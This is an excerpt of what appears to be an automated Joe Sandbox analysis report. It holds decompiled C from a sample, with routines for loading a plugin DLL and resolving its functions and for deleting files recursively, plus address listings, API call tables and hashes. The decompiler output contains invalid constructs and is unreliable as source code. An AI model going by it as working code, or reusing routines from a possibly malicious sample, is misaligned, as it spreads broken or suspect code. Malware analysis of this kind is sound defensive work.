										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 2;
											__ebx = E742512BB();
											 &_v12 = E74251B86( &_v12);
											__eax = E74251510(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E74251B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t271 =  *(_t332 + 0x1014);
											__eflags = _t271 - _v16;
											if(_t271 > _v16) {
												_v16 = _t271;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t271 - (_v36 == 3);
											if(_t271 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E74251B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(4);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x7425405c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x1018) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x1028) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E74251B86( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
												_t136 = _v16 + 0x81; // 0x81
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x1030)) = 0;
												 *((intOrPtr*)(__edi + 0x102c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x102c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x1030; // 0x1030
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t272 = _t269 - 1;
								__eflags = _t272;
								if(_t272 == 0) {
									_v16 = _t283;
									goto L80;
								}
								__eflags = _t272 != 1;
								if(_t272 != 1) {
									goto L162;
								}
								__eflags = _t286 - 0x6e;
								if(__eflags > 0) {
									_t309 = _t286 - 0x72;
									__eflags = _t309;
									if(_t309 == 0) {
										_push(4);
										L74:
										_pop(_t274);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t332 + 0x1010;
											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
											__eflags =  *_t96;
										} else {
											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
										}
										_v8 = 1;
										goto L57;
									}
									_t312 = _t309 - 1;
									__eflags = _t312;
									if(_t312 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t312 != 0;
									if(_t312 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t315 = _t286 - 0x21;
								__eflags = _t315;
								if(_t315 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t316 = _t315 - 0x11;
								__eflags = _t316;
								if(_t316 == 0) {
									_t274 = 0x100;
									goto L75;
								}
								_t317 = _t316 - 0x31;
								__eflags = _t317;
								if(_t317 == 0) {
									_t274 = 1;
									goto L75;
								}
								__eflags = _t317 != 0;
								if(_t317 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t283;
								_v36 = _t283;
								goto L20;
							}
						}
						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
						if( *((short*)(_t321 - 2)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							goto L43;
						}
						goto L17;
					}
					_t277 = _t258 - 5;
					if(_t277 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t283;
							_v20 = _t283;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t283;
							goto L20;
						}
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t283;
							_v20 = _t283;
							goto L20;
						}
					}
					if(_t281 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
					L182:
					return _t332;
				} else {
					_t225 =  *_t332 - 1;
					if(_t225 == 0) {
						_t187 = _t332 + 8; // 0x8
						_t324 = _t187;
						__eflags =  *_t324 - _t283;
						if( *_t324 != _t283) {
							_t226 = GetModuleHandleW(_t324);
							__eflags = _t226 - _t283;
							 *(_t332 + 0x1008) = _t226;
							if(_t226 != _t283) {
								L171:
								_t192 = _t332 + 0x808; // 0x808
								_t325 = _t192;
								_t227 = E742516BD( *(_t332 + 0x1008), _t325);
								__eflags = _t227 - _t283;
								 *(_t332 + 0x100c) = _t227;
								if(_t227 == _t283) {
									__eflags =  *_t325 - 0x23;
									if( *_t325 == 0x23) {
										_t195 = _t332 + 0x80a; // 0x80a
										_t231 = E742513B1(_t195);
										__eflags = _t231 - _t283;
										if(_t231 != _t283) {
											__eflags = _t231 & 0xffff0000;
											if((_t231 & 0xffff0000) == 0) {
												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t283;
								if(_v52 != _t283) {
									L178:
									_t325[lstrlenW(_t325)] = 0x57;
									_t229 = E742516BD( *(_t332 + 0x1008), _t325);
									__eflags = _t229 - _t283;
									if(_t229 != _t283) {
										L166:
										 *(_t332 + 0x100c) = _t229;
										goto L182;
									}
									__eflags =  *(_t332 + 0x100c) - _t283;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t206 = _t332 + 4;
									 *_t206 =  *(_t332 + 4) | 0xffffffff;
									__eflags =  *_t206;
									goto L182;
								} else {
									__eflags =  *(_t332 + 0x100c) - _t283;
									if( *(_t332 + 0x100c) != _t283) {
										goto L182;
									}
									goto L178;
								}
							}
							_t234 = LoadLibraryW(_t324);
							__eflags = _t234 - _t283;
							 *(_t332 + 0x1008) = _t234;
							if(_t234 == _t283) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t332 + 0x808; // 0x808
						_t236 = E742513B1(_t188);
						 *(_t332 + 0x100c) = _t236;
						__eflags = _t236 - _t283;
						goto L180;
					}
					_t237 = _t225 - 1;
					if(_t237 == 0) {
						_t185 = _t332 + 0x808; // 0x808
						_t238 = _t185;
						__eflags =  *_t238 - _t283;
						if( *_t238 == _t283) {
							goto L182;
						}
						_t229 = E742513B1(_t238);
						L165:
						goto L166;
					}
					if(_t237 != 1) {
						goto L182;
					}
					_t81 = _t332 + 8; // 0x8
					_t284 = _t81;
					_t326 = E742513B1(_t81);
					 *(_t332 + 0x1008) = _t326;
					if(_t326 == 0) {
						goto L181;
					}
					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1050)) = E742512CC(_t284);
					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
					_t90 = _t332 + 0x808; // 0x808
					_t229 =  *(_t326->i + E742513B1(_t90) * 4);
					goto L165;
				}
			}

0x74251c07
0x74251c0a
0x74251c0d
0x74251c10
0x74251c13
0x74251c16
0x74251c19
0x74251c1b
0x74251c1e
0x74251c21
0x74251c26
0x74251c29
0x74251c31
0x74251c39
0x74251c3b
0x74251c3e
0x74251c46
0x74251c46
0x74251c4b
0x74251c4e
0x00000000
0x00000000
0x74251c5b
0x74251c60
0x74251c62
0x74251cf4
0x74251cf4
0x74251cf4
0x74251cf8
0x74251cfb
0x74251cfd
0x74251d1f
0x74251d21
0x74251d24
0x74251d2d
0x74251d33
0x74251d35
0x74251d3b
0x74251d3b
0x74251d41
0x74251d44
0x74251d44
0x74251d47
0x74251d47
0x74251d4d
0x74251d4f
0x74251d4f
0x74251d51
0x74251d54
0x74251d57
0x74251d5d
0x74251d63
0x74251d66
0x74251d8a
0x74251d8d
0x00000000
0x00000000
0x74251d90
0x74251d92
0x74251da0
0x74251da3
0x74251da5
0x00000000
0x00000000
0x00000000
0x00000000
0x74251da7
0x74251da7
0x74251da7
0x74251dad
0x74251daf
0x00000000
0x00000000
0x74251db1
0x74251db3
0x74251db5
0x74251db7
0x00000000
0x00000000
0x00000000
0x74251db7
0x74251db9
0x74251dbb
0x74251dbd
0x74251dbd
0x74251dc3
0x74251dc9
0x74251dcb
0x74251ddf
0x74251ddf
0x74251de1
0x74251dcd
0x74251dd3
0x74251dd6
0x74251dd6
0x00000000
0x74251d68
0x74251d68
0x74251d68
0x74251d69
0x74251d71
0x74251d75
0x74251d7b
0x74251d7f
0x00000000
0x74251d7f
0x74251d6b
0x74251d6b
0x74251d6c
0x00000000
0x00000000
0x74251d6e
0x74251d6f
0x00000000
0x00000000
0x00000000
0x74251d6f
0x74251cff
0x74251d00
0x74251d09
0x74251d0c
0x74251d19
0x74251d19
0x74251d0e
0x74251d0e
0x74251de7
0x74251dea
0x74251dee
0x74251e61
0x74251e65
0x74251c43
0x00000000
0x74251c43
0x00000000
0x74251e65
0x74251cfd
0x74251c68
0x74251c6b
0x74251cce
0x74251cd1
0x74251ce3
0x74251ce3
0x74251ce6
0x74251df3
0x74251df6
0x74251df6
0x74251df8
0x742521ae
0x742521c6
0x742521c6
0x742521c9
0x00000000
0x00000000
0x742521b3
0x742521b4
0x742521b7
0x742521ba
0x74252244
0x7425224b
0x74252251
0x74252255
0x74251e5c
0x74251e5d
0x74251e5d
0x74251e5e
0x00000000
0x74251e5e
0x742521c0
0x742521c3
0x742521c3
0x742521cb
0x742521ce
0x74252238
0x74251e51
0x74251e54
0x74251e57
0x74251e5a
0x74251e5a
0x00000000
0x74251e5a
0x742521d0
0x742521d3
0x742521da
0x742521da
0x742521dd
0x742521e1
0x742521f5
0x742521f5
0x742521f8
0x742521fc
0x00000000
0x00000000
0x742521fe
0x74252202
0x00000000
0x00000000
0x74252204
0x7425220b
0x7425220b
0x74252211
0x74252214
0x74252230
0x74252216
0x7425221f
0x74252222
0x74252222
0x00000000
0x74252214
0x742521e3
0x742521e6
0x742521ea
0x00000000
0x00000000
0x742521ec
0x00000000
0x742521ec
0x742521d5
0x742521d8
0x00000000
0x00000000
0x00000000
0x742521d8
0x74251dfe
0x74251dfe
0x74251dff
0x74251f49
0x74251f49
0x74251f50
0x74251f53
0x00000000
0x00000000
0x74251f60
0x00000000
0x7425214b
0x7425214e
0x74252151
0x74252151
0x74252152
0x74252153
0x74252156
0x74252159
0x7425215c
0x00000000
0x00000000
0x7425215e
0x7425215e
0x74252162
0x7425217a
0x7425217d
0x74252181
0x74252187
0x00000000
0x74252187
0x74252164
0x74252164
0x74252167
0x00000000
0x00000000
0x74252169
0x7425216c
0x7425216e
0x7425216f
0x7425216f
0x7425216f
0x74252170
0x74252173
0x74252176
0x74252177
0x74252151
0x74252152
0x74252153
0x74252156
0x74252159
0x7425215c
0x00000000
0x00000000
0x00000000
0x7425215c
0x00000000
0x74251fa7
0x00000000
0x00000000
0x74251fb3
0x00000000
0x00000000
0x74251f9a
0x74251f9e
0x74251fa2
0x00000000
0x00000000
0x7425211c
0x74252120
0x00000000
0x00000000
0x74252126
0x7425212f
0x74252136
0x7425213e
0x00000000
0x00000000
0x74252083
0x74252083
0x00000000
0x00000000
0x74251fbc
0x00000000
0x00000000
0x742521a6
0x00000000
0x00000000
0x7425208b
0x7425208d
0x7425208d
0x00000000
0x00000000
0x74252196
0x00000000
0x00000000
0x7425219a
0x00000000
0x00000000
0x742521a2
0x00000000
0x00000000
0x742520d3
0x742520d5
0x742520d5
0x00000000
0x00000000
0x7425209d
0x7425209f
0x7425209f
0x00000000
0x00000000
0x742520af
0x742520b1
0x742520b1
0x00000000
0x00000000
0x742520e1
0x742520e3
0x742520e3
0x00000000
0x00000000
0x742520ba
0x742520bc
0x742520bc
0x00000000
0x00000000
0x742520c1
0x00000000
0x00000000
0x7425219e
0x742521a8
0x742521a8
0x00000000
0x00000000
0x742520ec
0x742520f0
0x742520f5
0x742520f8
0x742520f9
0x742520fc
0x74252102
0x74252102
0x00000000
0x00000000
0x7425218e
0x00000000
0x00000000
0x742520c5
0x742520c7
0x742520c7
0x00000000
0x00000000
0x74251fc3
0x74251fc3
0x00000000
0x00000000
0x742520da
0x742520dc
0x742520dc
0x00000000
0x00000000
0x74251f67
0x74251f6d
0x74251f70
0x74251f72
0x74251f72
0x74251f75
0x74251f79
0x74251f86
0x74251f88
0x74251f8e
0x74251f8e
0x74251f8e
0x00000000
0x00000000
0x7425208e
0x7425208e
0x74252090
0x74252097
0x00000000
0x00000000
0x742520d6
0x742520d6
0x00000000
0x00000000
0x742520a0
0x742520a0
0x742520a2
0x742520a9
0x00000000
0x00000000
0x742520b2
0x742520b2
0x742520b4
0x00000000
0x00000000
0x742520e4
0x742520e4
0x00000000
0x00000000
0x742520bd
0x742520bd
0x00000000
0x00000000
0x7425210a
0x7425210e
0x74252113
0x74252116
0x00000000
0x00000000
0x742520c8
0x742520c8
0x742520cb
0x742520cd
0x00000000
0x00000000
0x742520dd
0x742520dd
0x742520e6
0x742520e6
0x74251fc5
0x74251fc5
0x74251fc8
0x74251fcf
0x74251fd1
0x74251fd3
0x74251fda
0x74251fdd
0x74251fe2
0x74251fe4
0x74251fe6
0x74251fea
0x74251ff0
0x74251ff6
0x74251ff6
0x74251ff8
0x74251ff8
0x74251ff9
0x74251ff9
0x74251ffd
0x74252003
0x74252005
0x74252009
0x7425200e
0x7425200e
0x74252010
0x74252010
0x74252013
0x74252016
0x7425201f
0x74252025
0x74252028
0x74252028
0x7425202a
0x7425202d
0x74252033
0x74252039
0x74252039
0x7425203b
0x00000000
0x00000000
0x74252041
0x74252041
0x74252045
0x7425204c
0x74252070
0x74252070
0x74252074
0x74252076
0x74252079
0x74252079
0x7425207c
0x7425207c
0x00000000
0x74252074
0x74252051
0x74252054
0x74252054
0x7425205b
0x7425205d
0x74252060
0x74252067
0x74252068
0x7425206e
0x7425206e
0x00000000
0x7425206e
0x74252062
0x74252065
0x00000000
0x00000000
0x00000000
0x74252065
0x74251ff2
0x74251ff4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x74251f60
0x74251e05
0x74251e05
0x74251e06
0x74251f46
0x00000000
0x74251f46
0x74251e0c
0x74251e0d
0x00000000
0x00000000
0x74251e13
0x74251e16
0x74251f0b
0x74251f0b
0x74251f0e
0x74251f23
0x74251f25
0x74251f25
0x74251f26
0x74251f29
0x74251f2c
0x74251f38
0x74251f38
0x74251f38
0x74251f2e
0x74251f2e
0x74251f2e
0x74251f3e
0x00000000
0x74251f3e
0x74251f10
0x74251f10
0x74251f11
0x74251f1f
0x00000000
0x74251f1f
0x74251f14
0x74251f15
0x00000000
0x00000000
0x74251f1b
0x00000000
0x74251f1b
0x74251e1c
0x74251f07
0x00000000
0x74251f07
0x74251e22
0x74251e22
0x74251e25
0x74251e4e
0x00000000
0x74251e4e
0x74251e27
0x74251e27
0x74251e2a
0x74251e44
0x00000000
0x74251e44
0x74251e2c
0x74251e2c
0x74251e2f
0x74251e3e
0x00000000
0x74251e3e
0x74251e32
0x74251e33
0x00000000
0x00000000
0x74251e35
0x00000000
0x74251cec
0x74251cec
0x74251cef
0x00000000
0x74251cef
0x74251ce6
0x74251cd3
0x74251cd8
0x00000000
0x00000000
0x74251cda
0x74251cdd
0x00000000
0x00000000
0x00000000
0x74251cdd
0x74251c6d
0x74251c70
0x74251ca6
0x74251ca9
0x00000000
0x74251caf
0x74251cb1
0x74251cb5
0x74251cbc
0x74251cc3
0x74251cc6
0x74251cc9
0x00000000
0x74251cc9
0x74251ca9
0x74251c72
0x74251c73
0x74251c8e
0x74251c91
0x00000000
0x74251c97
0x74251c97
0x74251c9e
0x74251ca1
0x00000000
0x74251ca1
0x74251c91
0x74251c78
0x00000000
0x74251c7e
0x74251c7e
0x74251c85
0x00000000
0x74251c85
0x74251c78
0x74251e74
0x74251e79
0x74251e7e
0x74251e82
0x74252355
0x7425235b
0x74251e94
0x74251e96
0x74251e97
0x7425227e
0x7425227e
0x74252281
0x74252284
0x742522a1
0x742522a7
0x742522a9
0x742522af
0x742522c6
0x742522c6
0x742522c6
0x742522d3
0x742522d9
0x742522dc
0x742522e2
0x742522e4
0x742522e8
0x742522ea
0x742522f1
0x742522f6
0x742522f9
0x742522fb
0x74252300
0x74252312
0x74252312
0x74252300
0x742522f9
0x742522e8
0x74252318
0x7425231b
0x74252325
0x7425232d
0x7425233a
0x74252340
0x74252343
0x74252273
0x74252273
0x00000000
0x74252273
0x74252349
0x7425234f
0x7425234f
0x00000000
0x00000000
0x74252351
0x74252351
0x74252351
0x74252351
0x00000000
0x7425231d
0x7425231d
0x74252323
0x00000000
0x00000000
0x00000000
0x74252323
0x7425231b
0x742522b2
0x742522b8
0x742522ba
0x742522c0
0x00000000
0x00000000
0x00000000
0x742522c0
0x74252286
0x7425228d
0x74252293
0x74252299
0x00000000
0x74252299
0x74251e9d
0x74251e9e
0x7425225d
0x7425225d
0x74252263
0x74252266
0x00000000
0x00000000
0x7425226d
0x74252272
0x00000000
0x74252272
0x74251ea5
0x00000000
0x00000000
0x74251eab
0x74251eab
0x74251eb4
0x74251eb9
0x74251ebf
0x00000000
0x00000000
0x74251ec5
0x74251ed2
0x74251ed8
0x74251ee2
0x74251ee8
0x74251ef0
0x74251f00
0x00000000
0x74251f00

APIs

Part of subcall function 742512BB: GlobalAlloc.KERNELBASE(00000040,?,742512DB,?,7425137F,00000019,742511CA,-000000A0), ref: 742512C5

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 74251D2D
lstrcpyW.KERNEL32(00000008,?), ref: 74251D75
lstrcpyW.KERNEL32(00000808,?), ref: 74251D7F
GlobalFree.KERNEL32(00000000), ref: 74251D92
GlobalFree.KERNEL32(?), ref: 74251E74
GlobalFree.KERNEL32(?), ref: 74251E79
GlobalFree.KERNEL32(?), ref: 74251E7E
GlobalFree.KERNEL32(00000000), ref: 74252068
lstrcpyW.KERNEL32(?,?), ref: 74252222
GetModuleHandleW.KERNEL32(00000008), ref: 742522A1
LoadLibraryW.KERNEL32(00000008), ref: 742522B2
GetProcAddress.KERNEL32(?,?), ref: 7425230C
lstrlenW.KERNEL32(00000808), ref: 74252326

Memory Dump Source

Source File: 00000000.00000002.1945649868.0000000074251000.00000020.00000001.01000000.00000004.sdmp, Offset: 74250000, based on PE: true

Associated: 00000000.00000002.1945555867.0000000074250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1945760877.0000000074254000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1945856765.0000000074256000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74250000_SecuriteInfo.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 2dd4a934df52116f55b7f2caf90e2b7e268dff50f4a393b76f42e35535d530b8
Instruction ID: 5cd982e4491f36dc33d287fc7f79a24c1f982ab394c19ab1ade16e4d075b324b
Opcode Fuzzy Hash: 2dd4a934df52116f55b7f2caf90e2b7e268dff50f4a393b76f42e35535d530b8
Instruction Fuzzy Hash: 1922BD71F14206DADB11CFA5C9847EEF7B4FB04315F2045AAD166E21A0E7B49BA1CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405d7e
0x00405d83
0x00405d8c
0x00405d8f
0x00405d97
0x00405d9a
0x00405d9d
0x00405da5
0x00405da7
0x00405da8
0x00000000
0x00405da8
0x00405db3
0x00405db6
0x00405db6
0x00405db6
0x00405dba
0x00405dcd
0x00405dd4
0x00405dd9
0x00405ddd
0x00405ded
0x00405ddf
0x00405de5
0x00405de5
0x00405df2
0x00405df6
0x00405e02
0x00405e08
0x00405e0d
0x00405e13
0x00405e1e
0x00405e24
0x00405e26
0x00405e29
0x00405ed3
0x00405ed3
0x00405ed7
0x00405ed9
0x00405ed9
0x00405ed9
0x00405ed9
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e2f
0x00405e2f
0x00405e2f
0x00405e37
0x00405e57
0x00405e5f
0x00405e64
0x00405e6b
0x00405e86
0x00405e8b
0x00405e8d
0x00405eb1
0x00405e8f
0x00405e8f
0x00405e92
0x00405ea6
0x00405e94
0x00405e97
0x00405e9f
0x00405e9f
0x00405e92
0x00405e6d
0x00405e73
0x00405e75
0x00405e7b
0x00405e7b
0x00405e75
0x00000000
0x00405e6b
0x00405e39
0x00405e41
0x00000000
0x00000000
0x00405e43
0x00405e4b
0x00000000
0x00000000
0x00405e4d
0x00405e55
0x00000000
0x00000000
0x00000000
0x00405eb6
0x00405ebe
0x00405ec4
0x00405ec4
0x00405ecd
0x00000000
0x00405ecd
0x00405df8
0x00405e00
0x00000000
0x00000000
0x00000000
0x00405dbc
0x00405dbc
0x00405dbe
0x00405ede
0x00405ee0
0x00405ee3
0x00405f34
0x00405f34
0x00405f34
0x00405ee5
0x00405ee8
0x00405ef3
0x00405ef8
0x00405efa
0x00000000
0x00000000
0x00405efd
0x00405f09
0x00405f0e
0x00405f10
0x00000000
0x00405f2b
0x00405f12
0x00405f15
0x00000000
0x00000000
0x00405f1a
0x00000000
0x00405f21
0x00405eea
0x00405eea
0x00000000
0x00405eea
0x00405dc4
0x00405dc7
0x00000000
0x00000000
0x00000000
0x00405dc7

APIs

DeleteFileW.KERNELBASE(?,?,762E3420,762E2EE0,00000000), ref: 00405D9D
lstrcatW.KERNEL32(00425750,\*.*), ref: 00405DE5
lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,762E3420,762E2EE0,00000000), ref: 00405E0E
FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,762E3420,762E2EE0,00000000), ref: 00405E1E
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
FindClose.KERNEL32(00000000), ref: 00405ECD

Strings

\*.*, xrefs: 00405DDF
., xrefs: 00405E2F
PWB, xrefs: 00405DCD
., xrefs: 00405E43

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
